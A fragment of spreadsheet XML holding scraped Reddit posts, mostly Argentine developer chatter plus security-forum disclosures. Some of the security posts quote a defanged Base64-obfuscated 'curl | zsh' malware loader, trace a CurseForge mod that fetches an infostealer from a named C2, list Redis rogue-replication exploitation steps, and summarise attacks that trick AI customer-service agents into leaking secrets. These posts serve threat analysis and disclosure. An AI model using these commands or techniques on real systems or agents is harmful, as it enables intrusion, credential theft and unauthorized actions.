    <t>Vengo investigando esto hace un par de semanas porque estoy construyendo una herramienta para controlar compras de agentes con tarjeta virtual (Stripe Issuing, Ramp Agent Card, Privacy.com, wallets on-chain, etc). ACLARACIÓN IMPORTANTE: No hablo de gasto de tokens de OpenAI/Claude (eso ya lo resuelven Helicone y OpenRouter). Hablo de agentes que tienen tarjeta y compran cosas reales: suscripciones, SaaS, herramientas, servicios, ads. EL PROBLEMA: Los emisores te dejan poner un límite de monto ($500/mes), pero no pueden decirle al agente "solo comprá SaaS, no hardware" ni "no te suscribas a gambling". Esa capa de control de categorías, políticas y aprobaciones humanas no existe todavía encima de las tarjetas. LO QUE ESTOY CONSTRUYENDO: - Conectás tu tarjeta o wallet en modo lectura (sin tocar tu plata) - Te muestra qué compró cada agente y en qué categoría - Cola de aprobación: el agente pide permiso antes de comprar - Políticas tipo "este agente puede comprar software pero no servicios premium" - Pausa automática si detecta anomalías VALIDACIÓN: Antes de seguir avanzando quiero hablar con gente hispana que realmente tenga o esté pensando tener agentes con tarjeta. Tres preguntas concretas: ¿Tenés (o pensás tener pronto) algún agente con tarjeta virtual o wallet? ¿Cómo resolvés hoy qué puede y qué no puede comprar? ¿Qué te molestaría más de una herramienta como la que describo? Si me contás tu experiencia te regalo acceso early cuando lance, y el precio de $29/mes queda bloqueado de por vida para los primeros 50 que me ayuden ahora. PD: sé que el tema puede sonar adelantado al mercado hispano. Por eso pregunto acá antes que en ningún lado: si me dicen que esto todavía no es un problema real en LATAM, me ahorran meses de trabajo. Comentarios negativos me sirven tanto como los positivos. [link] [comments]</t>
  </si>
  <si>
    <t>C-151</t>
  </si>
  <si>
    <t>Laburo .net?</t>
  </si>
  <si>
    <t>Hola! Como están? Presiento estar al borde de un layoff en la empresa que laburo. Y sino es un layoff es una vuelta 100% a la presencialidad (hoy es 1 vez por semana). Vivo a 130 km de la oficina como dato de color. Empresa nacional, equipo chico. Cuando entré éramos muchos más pero de a poco se fue achicando todo al punto en el que estamos hoy. Tengo casi 5 años de experiencia, con .Net laburo hace casi 2. Actualmente estoy en un rol híbrido entre lo que será líder técnico (no hay otro) y scrum. Gestiono, tickets, incidentes, soy dueño de varios proyectos. Y codeo una banda. Tengo experiencia laburando con Claude y codex, skills para el manejo de docu, prs, etc. Que tan difícil está el mercado? Veo oportunidades .net seguido pero ni idea. No tengo nivel de inglés conversacional pero estoy en eso. Consejos? [link] [comments]</t>
  </si>
  <si>
    <t>C-152</t>
  </si>
  <si>
    <t>From Patch to Exploit; Using Claude Code to reverse engineer an n-day in Papercut NG</t>
  </si>
  <si>
    <t>C-153</t>
  </si>
  <si>
    <t>Están seguras las empresas de software en seguir bancando a la IA? Si caemos, caemos todos</t>
  </si>
  <si>
    <t>Lo mismo los decompiladores de juego, sueño con que le choreen el codigo fuente al fifa, los quiero ver llorar, esto es mucho peor y mas dañino que la pirateria [link] [comments]</t>
  </si>
  <si>
    <t>C-154</t>
  </si>
  <si>
    <t>¿Qué proyectos te gustaría compartir, pero no te animas (hasta ahora)?</t>
  </si>
  <si>
    <t>Tengo interés en saber si quisieran compartir algún proyecto o idea que hayan terminado (o esté en desarrollo), vibecodeando/codeando, de caracter personal (¿o no?). No importa si está hecho con IA, si es para el portfolio, si es para chivear o solucionar alguna bobada, de esas que decís "eh, no vale la pena un post". No hace falta un link. No hace falta una captura. Si solo quieren contar más o menos un poquito las cosas que han hecho (como voy a hacerlo yo), es totalmente válido. Por mi parte (todo hecho con la ayuda de Claudio, pero weno): — Un botcito para escuchar música en Discord, ya que todos los que usábamos con mis amigos están rotos. Hecho con Python, usando yt-dl para todo. Permite búsquedas de vídeos, reproducción por links, fetch de playlists de Spotify, etc. — Un editor de textos que funcione con localStorage (para hacer y compartir notas rápidas, que queden almacenadas en algún lado hasta que las borre sin necesidad de usar algo en la nube, con un contador de palabras, caracteres, resaltador de chunks en base a un límite de caracteres, que muestre cuánto espacio queda disponible, distintas "páginas"). Tengo la idea de pasarlo a una app de escritorio para no estar tan limitado, y capaz que hacerle algún sync con una db en sqlite, mongo, o algo. — Un conversor de vídeo a gif, seleccionando un desde y hasta, con ciertas compresiones, filtros. Quiero poder ampliarlo a algo que me deje seleccionar mejor esos timestamps y quizá hasta recortar, ya que es todo en terminal de momento. Esto hecho con FFMPEG y Python. — Un creador rápido de formularios que te da el código con react-hook-forms, la validación en zod o yup, y los estilos con grid (ya sea con CSS o Tailwind), haciendo drag-n-drop de cada componente. — Homescreen para Firefox, con "widgets" personalizados que sí me sirven. Estoy intentando implementar atajos para Jira, PRs que tengo abiertos, distintas timezones de gente con la que trabajo, etc. — Un tracker de recursos para distintas cuentas de un jueguito y saber el total general de éstas. Muy choto, pero con una "arquitectura" interesante: un user script de grasemonkey scrappeando, haciendo posts a un Cloudflare Worker hecho en Hono, que también aloja la página/dashboard donde se ven los recursos. Son cosas que probablemente me sirvan sólo a mí, pero me hace feliz tenerlas, y "haberlas hecho" específicamente para mis necesidades sin necesidad de recurrir a un servicio de terceros. Nunca las "compartí" abiertamente (ni en texto como lo acabo de hacer), pero capaz a alguien también le gustaría hacer el recuento, sorprenderse un poco de las cosas que llegó a hacer, y capaz hasta compartirlas directamente para que alguien las use (o aún mejor, haga un fork). [link] [comments]</t>
  </si>
  <si>
    <t>C-155</t>
  </si>
  <si>
    <t>Opiniones Redbee Sr. Dev</t>
  </si>
  <si>
    <t>opiniones sobre redbee como empresa? Ambiente, comodidades, sueldo, etc? [link] [comments]</t>
  </si>
  <si>
    <t>C-156</t>
  </si>
  <si>
    <t>Oferta de laburo para IT YPF</t>
  </si>
  <si>
    <t>Buenas Gordo’s. Tengo una oferta de trabajo para laburar como analista IT por consultora en YPF. Jornada full time, full remoto (a veces puede requerir presencia en las oficinas según lo pida el cliente). Es una afu mas de gestión con conocimientos técnicos però nexo entre proveedores y negocio. Q onda el ambiente de laburo acá? UPDATE: Gracias a todos por sus respuestas y buena onda, se pusieron la 10 en responderme y todo me suma. Les cuento que acepte pprque la guita me sirve y veremos que me depara el destino. Gracias a todos mis gordo’s 🖖 [link] [comments]</t>
  </si>
  <si>
    <t>C-157</t>
  </si>
  <si>
    <t>Fake OpenAI Codex malvertising campaign using Base64-obfuscated curl | zsh loader on macOS</t>
  </si>
  <si>
    <t>Sharing an apparent macOS malware campaign / IOC that I encountered today while searching for OpenAI Codex. A sponsored Google result led to a page impersonating Codex installation instructions. The command displayed legitimate-looking OpenAI/npm text, while the actual download URL was hidden using Base64. https://preview.redd.it/v31atwx50xjh1.png?width=1108&amp;format=png&amp;auto=webp&amp;s=6cb2d317c7fd455e75c67cec9e33085cf3a888c9 Defanged example, do not execute: echo "npm install -g u/openai/codex https://openai.com/codex/" &amp;&amp; curl -s $(echo "&lt;BASE64&gt;" | openssl base64 -d -A) | zsh The Base64 value decoded to: hxxps://quill-flint[.]com/curl/2h0w4vtm7c/7b4cckfhojxjbrcjon.json The interesting part is the delivery pattern: Sponsored search result ↓ Fake Codex installation page ↓ Legitimate-looking OpenAI text printed with echo ↓ Base64-obfuscated unrelated domain ↓ curl response piped directly into zsh I checked common persistence locations afterward and did not observe an obvious unknown LaunchAgent/LaunchDaemon or persistent executable. That makes me wonder whether this campaign is focused primarily on short-lived credential theft rather than persistence. The legitimate Codex installation on the machine was unrelated. It had been installed through Homebrew immediately beforehand and resolves to: /opt/homebrew/Caskroom/codex/0.147.0/bin/codex The binary is signed: Developer ID Application: OpenAI OpCo, LLC (2DC432GLL2) So the malicious component appears to be specifically the separately downloaded quill-flint[.]com shell payload. Has anyone tracking current macOS malware seen: quill-flint[.]com /curl/&lt;id&gt;/&lt;id&gt;.json or this exact Codex-themed lure? I'm particularly interested in attribution to an existing stealer family/campaign, related infrastructure, historical samples, or additional IOCs associated with this delivery chain. I can provide more sanitized timestamps and filesystem observations if useful for analysis. [link] [comments]</t>
  </si>
  <si>
    <t>C-158</t>
  </si>
  <si>
    <t>The Cloudflare Appstore (Appflare) Malware Audit</t>
  </si>
  <si>
    <t>C-159</t>
  </si>
  <si>
    <t>Hacking AI customer service agents (Bug Bounty Village DEF CON 34)</t>
  </si>
  <si>
    <t>At Bug Bounty Village during DEF CON 34, Inti De Ceukelaire delivered a talk on how attackers can abuse today's AI agents in ways most defenders haven't thought about yet, from tricking agents into spilling secrets to forcing them to carry out unauthorized actions on behalf of the victim. This resulted in over $50,000+ in bounties in just a few weekends, without actually poking the target with Burp Suite or any automated scanners. [link] [comments]</t>
  </si>
  <si>
    <t>C-160</t>
  </si>
  <si>
    <t>Seguridad 😎</t>
  </si>
  <si>
    <t>https://preview.redd.it/mag4mtbagavh1.png?width=851&amp;format=png&amp;auto=webp&amp;s=7bade68c342b9600acd2e765779393fd2cfa9bf6 [link] [comments]</t>
  </si>
  <si>
    <t>C-161</t>
  </si>
  <si>
    <t>Anatomy of an Android malware APK: hidden DEX, remote ad modules and links to Konfety/Kaleidoscope</t>
  </si>
  <si>
    <t>C-162</t>
  </si>
  <si>
    <t>Browser session theft is quietly becoming more dangerous than password theft</t>
  </si>
  <si>
    <t>C-163</t>
  </si>
  <si>
    <t>Gordo freelancer te invoco, quiero dar el primer paso para vender mis servicios</t>
  </si>
  <si>
    <t>Buenas! Soy desarrollador hace unos 5 años ya, hace rato quiero freelancear para tener un ingreso extra. Hoenstamente, yo creo que soy un buen desarrollador, se implementar de 0 a 100 webapps, así que creo que tener la posibilidad de elegir proyectos, arrancar vendiendo landings, o sistemas para gimnasios simples o no muy complejas para agarrar cancha me pueden venir bien. El tema es que, no se como arrancar, se que suena medio boludo pero es así. Tengo un target que es una paloma con dinero, un chabon de mi ciudad dueño de varios gimnasios que un poco flasha CEO masivo, realmente veo que le falta una web o algo para centralizar su informacion, el tema es que no tiene nada de info de contacto, y no le quiero hablar por instagram, tampoco se si hablarle desde mi propio instagram privado me siento un vendedor de cursos, antes tenia una consultora con un familiar donde haciamos software a medida. Pero ripeo, podria recuperarla o iniciar una nueva? la anterior tenia actividad y un poco de seguidores, y una marca armada ya. No se, me da menos verguenza acercarme así que con mi cuenta personal, aunque, invierto en mi marca personal mi nombre y apellido sale mi exp laboral, mi portfolio con proyectos y notas tipo blog. O sea, hice un laburo ahí tambien. No soy el tipico desarrollador autista, pero no se si acercarme con un email, como se si tiene interes, la verdad que mi estrategia sin consultar aca seria ir medio en bolas y usar el carisma, decirle che mira la verdad que estoy arrancando a freelancear y detecte que tu negocio tiene estas cosas.. y decirle lo que veo, otra cosa. La idea es escalar el proceso, o sea, me quiero mappear mi ciudad, rastrear emprendimientos medianos, evaluar posibiliades y ofrecerles algo respecto eso, mas visibilidad, configurarles el SEO, todo con ia obvio, que tengna mejor presencia en la web en general, mediante una web encajada por mi, y tamiben hacer algo extra si es necesario como configurarles la presencia web, que aparezcan en maps, o completarles si le faltan datos, no se. rebuscarmela de alguna manera, no lo pienso como algo super costoso pero tampoco me gustaria regalarlo, aunque estoy dispuesto a hacerlo barato en un principio hasta que agarre vuelo al menos Despues.. como resuelven el tema de el hosting y dominio? lo incluyen en el presupuesto? aclaran que es mensual/anual? le dan que ponga la tarjeta y haga el pago el? xD esas cosas no me dejan dormir en la noche Alguien que haya pasado por esto o alguna reco? gracias gorditos! buena jornada. [link] [comments]</t>
  </si>
  <si>
    <t>C-164</t>
  </si>
  <si>
    <t>GitHub Actions leaking secrets when Miri output is cached</t>
  </si>
  <si>
    <t>C-165</t>
  </si>
  <si>
    <t>Proyecto Aplicacion Web : Divisor de gastos</t>
  </si>
  <si>
    <t>C-166</t>
  </si>
  <si>
    <t>LLM-Driven Reverse Engineering vs Iterative LLM Obfuscation</t>
  </si>
  <si>
    <t>C-167</t>
  </si>
  <si>
    <t>Assessing user rage...</t>
  </si>
  <si>
    <t>(qué tan bueno/malo es Gemini?) [link] [comments]</t>
  </si>
  <si>
    <t>C-168</t>
  </si>
  <si>
    <t>Casi todos los posts y los comentarios son negativos. Alguien puede contar experiencias buenas que esten teniendo?</t>
  </si>
  <si>
    <t>Alguno de ustedes tiene alguna historia positiva, por ejemplo que consiguieron trabajo recientemente y que esta bueno, aprenden algo que les gusta, estan motivados? Aunque no todas sean cosas positivas, alguien esta contento con su trabajo, siente que progresa en IT? [link] [comments]</t>
  </si>
  <si>
    <t>C-169</t>
  </si>
  <si>
    <t>Undetected malware distributed through CurseForge mods - live sample in post</t>
  </si>
  <si>
    <t>My girlfriend was the unfortunate victim of an NPM Infostealer Malware, specifically, the Nyx Infostealer The bigger issue is - the malware was distributed through Curse Forge. Not through an import, not through a link, but directly through the mod manager client. The mod in question is DO NOT DOWNLOAD -&gt;&gt; curseforge.com/stardewvalley/mods/cozy-valley-decor &lt;&lt;-- DO NOT DOWNLOAD The linked mod (link generated from the Curse Forge client, by clicking "Link to Project", can also be searched for in the Curse Forge Client. The linked mod will download regular looking mod files. Amongst them will be CozyValleyDecor.dll. Decompiling this .dll with ILSpy reveals that on game startup, a function called "RunPayload()". This function reads an ExternalHelper.dll file, which is an embedded resource to the actual CozyValleyDecor.dll, and executes a function called "PayloadRunner.ExecuteAsync()". This function will then decrypt a byte-shifted URL, which points to an .exe file. The file downloaded will be "basarili.exe", downloaded to the Temp folder of Windows, and will immediatelly execute. This file contains a "chat" client where the attacker can make a popup appear and demand money, but it also overrides the Discord installation files (specifically index.js), with malicious code, that steals your Discord credentials, 2FA, currently authenticated session and connected mail account. It then reads the local credentials and steals browser-saved credentials to your email, social media and crypto accounts. The encrypted address points to MALWARE -&gt;&gt; 161 97 85 100 port 3131 slash download slash yarrak exe &lt;&lt;-- MALWARE and the Discord malware and "chat" client will connect to MALWARE -&gt;&gt; 161 97 85 100 port 3000 &lt;&lt;- MALWARE CurseForge is generally treated as a save and secure way to get mods, so users will not suspect they are vulnerable to malware by downloading mods there. This exploit is rather recent, as none of the Anti-Virus software (including MalwareBytes and TotalVirus) were able to identify CozyValleyDecor.dll as malicious. If anyone wants to have a further examination at how the attack vector works, and why it remains undetected by anti-virus, here's your chance. [link] [comments]</t>
  </si>
  <si>
    <t>C-170</t>
  </si>
  <si>
    <t>¿Como usar la IA para codear?</t>
  </si>
  <si>
    <t>Hola a todos, a esta altura del año ya me da verguenza preguntar esto, pero la realidad es que no profundice en los distintos usos. Como lo hago yo? Pregunto a ChatGPT/Claude/Microsoft Copilot mis dudas, me responde, copio y pego el codigo o lo aplico segun lo necesite. Intenté aprender otras formas pero me abruma, necesito ver el codigo. Por eso, quiero saber como lo usan ustedes. A través de la terminal, las aplicaciones de escritorio como Codex/Antigravity/Claude Code, otras formas que yo no conozca (?). Saludos [link] [comments]</t>
  </si>
  <si>
    <t>C-171</t>
  </si>
  <si>
    <t>Teardown of a custom camera exploitation and viewing project (camview) found in an open directory</t>
  </si>
  <si>
    <t>Found inside camview.tar.gz on an exposed server: a Docker project used to find, exploit, and stream internet-exposed IP cameras in a browser. The operator's own name for it, from the archive and README, is camview. It is not connected to any legitimate app of the same name. Built with FastAPI and Uvicorn, Python 3.11 image with FFmpeg, nmap, and masscan baked in FFmpeg transcodes the camera RTSP feed to MJPEG for display; nmap and masscan provide the initial scan layer The audit feature is where the exploitation happens: cameras are fingerprinted across a dozen-plus brands, queried over ONVIF, tested against known CVEs, then brute-forced over HTTP and RTSP with a 3,811-entry username:password dictionary Working credentials and stream URL patterns are written to disk and prioritized on later runs, so it improves per vendor The exploitation itself is not custom. camview wraps Ingram, a public webcam scanner, mounted in from the host On a second, unrelated directory, scripts named camworm.py and routerworm.py follow a compromise-then-proxy pattern and contain no actual worm functionality despite the naming We rebuilt the UI in a sealed test environment by running it with empty data. Full analysis in the post: https://hunt.io/blog/russian-speaking-operator-ukrainian-camera-toolkit [link] [comments]</t>
  </si>
  <si>
    <t>C-172</t>
  </si>
  <si>
    <t>Ayuda para publicar 1 pagina</t>
  </si>
  <si>
    <t>Hola gente! Estoy desarrollando por mi cuenta una web tkpo mapa con puntos turisticos, que quiero lanzar antes de noviembre si o si. Llevo casi 1 año haciéndola con Claude pero estoy trabado con la parte de usuarios/seguridad y panel admin. No soy programador, así que explico brevemente cómo está armada: Firebase para usuarios y datos. Vercel/GitHub para la web. Las imágenes están alojadas en otro servicio. 3 tipos de usuarios: Admin (yo), usuario con permisos sobre determinada información y usuario público. El problema principal es que el panel de administración dobde modifico pines del map e info y activo o desactivo cosas está dentro del frontend público. Quiero sacarlo de ahí y separarlo correctamente, para que un usuario público no pueda verlo, accederlo ni encontrarlo simplemente inspeccionando el frontend con F12. La idea es mantener ambas partes conectadas, pero tener por separado la web pública y el panel de administración, con sus respectivos permisos. Cómo hago para que cada usuario al acceder y modificar su infi nadie con f12 vea la info de usuarios? Por ejemplo, emails, datos de cuentas o información administrada por otras personas. Por último, más adelante quiero pasar la web a un dominio .com. ¿Conviene hacer primero esta separación entre la parte pública y el admin y después conectar el dominio? Cualquier orientación sobre cómo debería estructurarlo y en qué orden hacer estos cambios me sirve muchísimo. [link] [comments]</t>
  </si>
  <si>
    <t>C-173</t>
  </si>
  <si>
    <t>Me Cambio a Uala?</t>
  </si>
  <si>
    <t>Ya se que hay varias publicaciones de Uala. Quiero saber específicamente si el ambiente laboral de ahí está hecho una mierd** como el de meli. La cultura ahí está por el piso. Puro KPI enfermizo al estilo de: métricas de cuánto codigo hace la IA, cuantos PRs tiras, cuantos mensajes mandas, cuantas herramientas de IA usas en el día, cuantos créditos de IA consumis, etc…. Me llego una oferta de UALA y la verdad que no quiero caer en un lugar igual o peor. Saben como se labura ahí adentro? Ni aunque me cierre el sueldo quiero ir si es así de verga. Estoy por ascender a Sr engineer y ya estoy cansado del humo de la IA que te piden para poder escalar. También me llego una oferta de una empresa de Uruguay, pero es re poco conocida: Kinamic [link] [comments]</t>
  </si>
  <si>
    <t>C-174</t>
  </si>
  <si>
    <t>Inside BambooToken’s Linux implant: shell and file control over MQTT</t>
  </si>
  <si>
    <t>C-175</t>
  </si>
  <si>
    <t>SaaS o mantenimiento (en ARS): actualizan por IPC?</t>
  </si>
  <si>
    <t>Básicamente eso, a los que cobran montos mensuales ya sea por tener SaaS en pesos argentinos o porque cobran mantenimiento mensual de sistemas que ya desarrollaron, suelen actualizar esos montos por IPC? [link] [comments]</t>
  </si>
  <si>
    <t>C-176</t>
  </si>
  <si>
    <t>Lunex Unmasked: A New Information Stealer Deployed Through BYOVD</t>
  </si>
  <si>
    <t>C-177</t>
  </si>
  <si>
    <t>Pre-installed C2 loader on cheap Android projectors - deploys proxy/ad-fraud botnets, can run arbitrary code</t>
  </si>
  <si>
    <t>Hi everyone, I recently bought one of those cheap Android projectors (Nonete HY260Pro, Allwinner H713) and noticed some suspicious network activity. Being curious, I decided to set up a lab, intercept the traffic, and dig into the firmware. I ended up uncovering a factory-installed malware ecosystem: a disguised dropper (StoreOS), a hidden second stage (SilentSDK) and a plugin loader that talks to a C2 server in China (api.pixelpioneerss.com) and deploys up to 5 botnet/fraud plugins. Key findings of my analysis: Four-stage infection chain: StoreOS → SilentSDK → PluginManager → final plugins. Payloads are hidden with a "Byte-Reversal" trick, XOR encryption and build-fingerprint spoofing. The plugins currently enroll the device in residential proxy networks (XFJ/net2fast, a UDP proxy node, indicators consistent with the Vo1d botnet) and run ad/click fraud, partly geo-fenced server-side. The loader executes downloaded code with system privileges, so the operators can push any payload at any time. I only observed proxy and ad-fraud plugins, but the capability for remote code execution is there by design. The device also ships with open root backdoors and sends device identifiers (MAC, serial, Android ID) to servers in China. An independent researcher found identical infrastructure on a Magcubic HY300 Pro+, which suggests the problem is the H713 firmware base and not one brand. I could only verify my own device. This is my first independent technical report and deep dive into malware research. I've documented the full kill chain, decrypted the obfuscated strings, listed IOCs and mitigations (DNS blocklist, ADB disable commands), and written scripts to repair the malformed payloads for analysis. Full Report: https://github.com/Kavan00/Android-Projector-C2-Malware I'd love to get your opinion on the report, especially from owners of other H713 devices who can compare. Looking forward to your feedback! [link] [comments]</t>
  </si>
  <si>
    <t>C-178</t>
  </si>
  <si>
    <t>Recommendation</t>
  </si>
  <si>
    <t>Do any of you have experience testing cracked software for malware? I’d like to learn how to analyze it properly. Where should I start, and what tools or techniques would you recommend for a beginner? [link] [comments]</t>
  </si>
  <si>
    <t>C-179</t>
  </si>
  <si>
    <t>Evading Machine Learning Based Detections · MSec Operations Blog</t>
  </si>
  <si>
    <t>C-180</t>
  </si>
  <si>
    <t>Off the Hook: Discovering and Observing Active Exploitation of Sangoma Switchvox CVE-2026-9586</t>
  </si>
  <si>
    <t>C-181</t>
  </si>
  <si>
    <t>CVE-2026-102489 Deep-Dive: Zammad Session Leak to RCE</t>
  </si>
  <si>
    <t>C-182</t>
  </si>
  <si>
    <t>Apúrense muchachos, falta poco</t>
  </si>
  <si>
    <t>Metanle pata que es una gran oferta [link] [comments]</t>
  </si>
  <si>
    <t>C-183</t>
  </si>
  <si>
    <t>Mi primer entrevista en un Banco, consejos?</t>
  </si>
  <si>
    <t>Hola! Bueno basicamente a través de una consultora pase a una segunda instancia (y definitoria) de entrevista con un Banco para el rol de Business Analyst. Buscan un perfil bastante hibrido, yo creo que cumplo en un 80% lo que buscan. Pero quiero consultar más alla de eso... Es la primera vez que tengo una entrevista en un banco y obviamente me gustaría dar mi mejor performance porque la contratación es directamente con ellos y con todos los beneficios que eso trae. Alguien que pueda tirarme un par de centros con tips y como prepararme más allá de lo tecnico. La entrevista es con el PO, quien lidera el el equipo para el cual estan entrevistando Gracias! [link] [comments]</t>
  </si>
  <si>
    <t>C-184</t>
  </si>
  <si>
    <t>Migrar hacia la parte economica/marketing?</t>
  </si>
  <si>
    <t>Buenas, estoy a un año de terminar una tecnicatura en programación y me he dado cuenta que capaz el desarrollo no es tanto lo mio. Capaz si tenerlo de hobby, pero no me veo dedicandome a esto toda mi vida. Y a eso se le suma la incertidumbre que me da todo el tema IA. Ahora en la facultad que esta en mi ciudad, hay una carrera orientada a la economia y el marketing. A todo esto, trabajo en el negocio familiar, y creo que podia potenciarme. Pero tambien no terminar la tecnicatura a esta altura me parece un despercidio, por mas de que el titulo no sirva para nada. Ademas el tema del marketing siempre me intereso. Tengo 20. [link] [comments]</t>
  </si>
  <si>
    <t>C-185</t>
  </si>
  <si>
    <t>Tengo una oferta de Proxify.io, alguno sabe si es buena empresa para trabajar?</t>
  </si>
  <si>
    <t>C-186</t>
  </si>
  <si>
    <t>Recomendación de instituto para una Tecnicatura?</t>
  </si>
  <si>
    <t>buen dia gente, como están? actualmente resido en La Plata, Buenos Aires quiero retomar mi aprendizaje a la Informática, intente en Universidad Técnica Nacional y UNLP pero se me complicaba mucho con el laburo(complicado) bueno estoy por optar una carrera corta, en algún instituto privado que no sea tan costoso o si lo llegase a ser que sea muy bueno ya sea presencial o Virtual quiero aprender a programar, no solo que me enseñen a tirar códigos, me gusta aprender y hacer la resolución de los problemas( en la facu había llegado a punteros y pilas) alguna recomendación? muchas gracias, Saludos! [link] [comments]</t>
  </si>
  <si>
    <t>C-187</t>
  </si>
  <si>
    <t>Usar ingeniera inversa para portear juegos de pc a Android es el futuro del gaming en celular? Yo lo hare.</t>
  </si>
  <si>
    <t>Hace días estaba con la duda de como funcionaba gamehub por dentro, descubri que era un emulador, lo cual quita como un 50% del rendimiento real que puede dar tu telefono al juego. He visto los posts donde logran clonar juegos y/o apps siendo estos open source, tenia la duda de como hacerse solo con IA. Pensaba en clonar un L4D2 para mobiles, no identico por motivos de copyrigth Estoy con unas pequeñas vacaciones (desempleado), me informe y vi que la mejor opcion para lograr mi cometido es usar Open Code con OLlama, teniendo el respositorio de REA. Hay opciones mejores o deberia continuar en donde estoy? [link] [comments]</t>
  </si>
  <si>
    <t>C-188</t>
  </si>
  <si>
    <t>I got tired of users clicking on stupid links so I built this chrome extension</t>
  </si>
  <si>
    <t>It's called Click Scout - you hover over the link or email sender, and it tells you if it's safe or not. Were gonna push it out to a couple of our repeat offenders at my company. 100% free, just built it to help fewer people get suckered into clicking on stupid stuff. https://chromewebstore.google.com/detail/clickscout/ekmbgkphebegmfflhfceppmpcheldfak?hl=en-US&amp;utm_source=ext_sidebar [link] [comments]</t>
  </si>
  <si>
    <t>C-189</t>
  </si>
  <si>
    <t>Banana RAT Evolves</t>
  </si>
  <si>
    <t>Full report is available at https://any.run/cybersecurity-blog/banana-rat-evolution-analysis/ The exposed server at 198[.]245[.]53[.]26 gave a rare opportunity to compare two related Banana RAT branches through live infrastructure, sandbox telemetry, and recovered payloads. The older branch used ETW-themed paths, static Microsoft-looking names, and a typo-based pseudo-Microsoft C2 identity. The newer branch kept the same staging concept but moved to randomized install identifiers, better-structured SYSTEM persistence, and a WebSocket channel built around a hashed testewin.com subdomain. IoC: 198[.]245[.]53[.]26 https://app.any.run/tasks/96796146-688f-4b12-894c-236dadab8413 [link] [comments]</t>
  </si>
  <si>
    <t>C-190</t>
  </si>
  <si>
    <t>Discord groups for malware development</t>
  </si>
  <si>
    <t>Does anyone know people who are experts in this field? I have some questions. [link] [comments]</t>
  </si>
  <si>
    <t>C-191</t>
  </si>
  <si>
    <t>EntropyStrip: finding hidden payloads when naive Shannon entropy misses them</t>
  </si>
  <si>
    <t>Hey everyone, While analyzing modern loaders and crypters, I kept running into cases where naive, section-wide Shannon entropy ($H &gt; 7.2$) failed to flag suspicious binaries: Averaging dilution: Stashing a 20 KB encrypted shellcode blob inside a 1 MB .rdata section padded with nulls keeps the global entropy below 5.5. Artificial dilution: Padding ciphertext with repeated non-null bytes (like NOP sleds or repeated delimiters) artificially compresses entropy down to benign code levels. String-based staging: Staging payloads as UUID or IPv4 tables (UuidFromStringA, RtlIpv4StringToAddressA) keeps disk entropy around 4.0 until runtime reassembly in memory. Most quick-triage tools calculate entropy across the entire file or whole sections, which washes out these localized spikes. To solve this, I wrote EntropyStrip, an open-source Python CLI designed for fast PE structural triage. What it does differently: Dual-Resolution Sliding Windows: Scans sections and overlays in 1024-byte and 256-byte windows with a 50% step to catch concentrated cryptographic stagers regardless of total section size. Dilution Defense &amp; Chi-Square: Analyzes modal byte distributions and opcode frequency curves to flag artificially flattened ciphertext. String Staging Primitives: Flags UuidFromString* and RtlIpv4StringToAddress* staging patterns and detects formatted UUID payload clusters. False Positive Reduction: Validates WIN_CERTIFICATE Authenticode tables and NSIS header signatures (0xdeadbeef) so digitally signed binaries and legitimate installers are not falsely scored as malware droppers. Payload Carving: Includes --dump to carve out anomalous sections or trailing overlays straight to disk for Ghidra or x64dbg. Directory Triage: --dir walks entire folders and ranks binaries on a risk leaderboard with MITRE ATT&amp;CK mapping (T1027, T1055, etc.). Quick install: bash pip install entropystrip Edit: Fixed Markdown [link] [comments]</t>
  </si>
  <si>
    <t>C-192</t>
  </si>
  <si>
    <t>En busca de un Standing Desk</t>
  </si>
  <si>
    <t>Han tenido experiencia con estos escritorios que suben y bajan? Cual recomiendan? [link] [comments]</t>
  </si>
  <si>
    <t>C-193</t>
  </si>
  <si>
    <t>CVE-2026-91766: PHP had the redirect credential leak curl fixed in 2018</t>
  </si>
  <si>
    <t>C-194</t>
  </si>
  <si>
    <t>Ciberseguridad o Programacion?</t>
  </si>
  <si>
    <t>Hola buenas, me encuentro en la necesidad de buscar una salida laboral, como paso mucho tiempo con la PC (Productor musical y gamer) se me ocurrieron estos dos campos laborales. Hay alguien que trabaje como ciberseguridad que me pueda explicar un poco en que consiste el trabajo? Donde recomienda estudiar? y por otro lado, para los programadores, aconsejan estudiar programacion? Siendo que es una carrera que se esta saturando, y que la IA amenaza constantemente? Muchas gracias a todos! [link] [comments]</t>
  </si>
  <si>
    <t>C-195</t>
  </si>
  <si>
    <t>🚨 Redis Cryptomining Botnet Compromised 3,562 Servers, Exposed by the Operator's Own Files</t>
  </si>
  <si>
    <t>Researchers indexed an open directory on 188.245.99.156 (Hetzner) that held an operator's full Redis cryptomining toolkit, not just a payload. 147 files in total: Python exploit source, JSON campaign logs, a bundled portable Python 3.11 runtime, and two exported Windows registry hives. Because the raw campaign logs were sitting there, the numbers come from the operator's own per-host records, not the summaries their scripts print: 3,562 distinct Redis servers compromised out of 12,966 targeted, across two independently coded runs The only technique that scaled is rogue replication: PING to confirm no-auth, CONFIG SET dir/dbfilename, SLAVEOF to a rogue master, then a crafted RDB blob with an embedded newline that drops a cron entry into /etc/cron.d/ That cron job pulls a legit XMRig release straight from GitHub and points it at pool.moneroocean.stream:443 over TLS SSH key injection via AOF returned 0 of 2,342, MongoDB JS sandbox escape 0 of 468. Every SSH attempt bounced at the first CONFIG SET with AUTH_REQUIRED Confirmed victims span Redis 2.8.17 to 7.2.0, so this is missing authentication, not a version-specific bug A third run against a pre-qualified no-auth list hit 72.6%, roughly triple the full-fleet rate, so target-list freshness is the real limiter, not the technique The same Monero wallet turns up in a separate February 2026 open directory in Moldova with Meterpreter and XMRig deployers and no Redis component, which pushes known activity back at least five months Fix is config, not patching: requirepass, disable SLAVEOF/REPLICAOF where replication is not in use, or enable protected-mode. Upgrading does nothing here. Full write-up with IOCs: https://hunt.io/blog/redis-cryptomining-botnet-3562-servers [link] [comments]</t>
  </si>
  <si>
    <t>C-196</t>
  </si>
  <si>
    <t>CVE-2026-32740: RCE in a PIE Next.js sharp/libheif Stack</t>
  </si>
  <si>
    <t>C-197</t>
  </si>
  <si>
    <t>Fake Interpol “Investigation” Emails Are Dropping Ransomware on Small Businesses</t>
  </si>
  <si>
    <t>C-198</t>
  </si>
  <si>
    <t>Three memory-safety bugs in Godot's untrusted-file parsers</t>
  </si>
  <si>
    <t>Author here. The post describes three memory-safety bugs which have been in Godot since v1.0 and v3.0. All three are still present in current releases. The bugs can affect exported games that load community-authored data files. Godot allows attackers using maliciously crafted files to trigger reads or writes past the end of a buffer, inside the process running the game. The post includes the response from Godot maintainers who deny this is a security issue, and my reply to them. Happy to give more information about the bugs or the audit if there are questions. [link] [comments]</t>
  </si>
  <si>
